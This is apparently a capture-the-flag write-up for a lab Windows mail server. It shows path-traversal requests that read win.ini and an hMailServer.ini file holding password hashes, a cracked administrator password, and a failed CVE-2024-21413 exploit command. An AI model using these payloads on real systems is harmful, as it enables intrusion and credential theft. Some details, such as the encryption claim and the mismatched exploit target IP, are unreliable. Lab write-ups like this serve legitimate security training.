Enumeration
Starting with a comprehensive nmap scan:
sudo nmap -sS -sC -A 10.10.11.14 -T4 -oN first.scan -p-
Key Findings
The scan reveals a Windows server running hMailServer with multiple mail-related services:
- Port 25/587: SMTP (hMailServer)
- Port 80: HTTP (Microsoft IIS 10.0) - redirects to
mailing.htb - Port 110: POP3 (hMailServer)
- Port 143/993: IMAP (hMailServer)
- Port 445: SMB
- Port 465: SSL/SMTP
- Port 5985: WinRM
Domain identified: mailing.htb
Web Enumeration
Local File Inclusion Discovery
When downloading a PDF from the website, the URL structure reveals a potential LFI vulnerability:
http://mailing.htb/download.php?file=instructions.pdf
Testing LFI
Using Burp Suite to test for directory traversal:
GET /download.php?file=../../../../windows/win.ini HTTP/1.1
Host: mailing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="win.ini"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
LFI confirmed! We can read arbitrary files on the system.
Credential Discovery
Extracting hMailServer Configuration
Using the LFI to retrieve the hMailServer configuration file:
GET /download.php?file=../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini HTTP/1.1
Host: mailing.htb
Retrieved Configuration:
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Password Cracking
According to hMailServer documentation:
- PasswordEncryption=1 means Blowfish encryption
After cracking the administrator hash:
Credentials discovered: administrator:homenetworkingadministrator
Exploitation Attempt - CVE-2024-21413
Attempting to exploit Microsoft Outlook Remote Code Execution vulnerability using discovered credentials.
Exploit Setup
Using the public exploit: CVE-2024-21413 PoC
python3 exploit.py --server "192.168.0.105" \
--port "993" \
--username "[email protected]" \
--password "homenetworkingadministrator" \
--sender "[email protected]" \
--recipient "[email protected]" \
--url "https://10.10.14.13" \
--subject "Hello"
Result:
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
? Failed to send email: [Errno 111] Connection refused
Connection refused on all SMTP/IMAP ports - additional enumeration needed to find the correct exploitation path.
Next Steps
- Enumerate valid email users on the system
- Test different mail server ports and protocols
- Investigate alternative exploitation vectors for hMailServer
- Explore other services exposed on the target
Key Takeaways
- LFI vulnerability in
download.phpallowed reading sensitive configuration files - hMailServer credentials were stored in an accessible INI file
- Password encryption using Blowfish was crackable
- Further enumeration needed to progress beyond credential discovery